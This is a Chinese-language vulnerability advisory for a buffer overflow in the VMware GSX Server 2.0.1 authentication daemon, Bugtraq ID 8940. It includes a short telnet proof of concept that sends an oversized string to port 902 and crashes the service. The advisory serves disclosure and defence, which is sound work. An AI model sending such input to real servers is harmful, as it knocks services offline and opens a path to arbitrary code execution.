|
受影响系统:
VMWare GSX Server 2.0.1 build 2129
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 8940
VMware GSX Server是一款非常流行的虚拟PC机软件,其中包含远程访问验证服务。
VMWare GSX Server包含的验证服务器在处理用户提交的数据时缺少充分检查,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击,可能以GSX服务程序进程权限在系统上执行任意指令。
Vmware-authd服务在对USER, PASS, GLOBAL等命令的参数进行了严格的输入检查,但是对初始化readline缺少充分的边界缓冲区检查,当超大的数据发送给authd时,会导致VMAuthdSocketRead()发生缓冲区溢出,精心构建提交数据可能以GSX服务程序进程权限在系统上执行任意指令。
<*来源:Darryl Swofford (dswofford@kpmg.com)
链接 http://marc.theaimsgroup.com/?l=bugtraq&m=106761920206734&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Darryl Swofford (dswofford@kpmg.com)提供了如下测试方法:
> telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 vmware-authd PANIC: Buffer overflow in \
VMAuthdSocketRead() >
Connection to host lost.
建议:
--------------------------------------------------------------------------------
厂商补丁:
VMWare
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.vmware.com
|
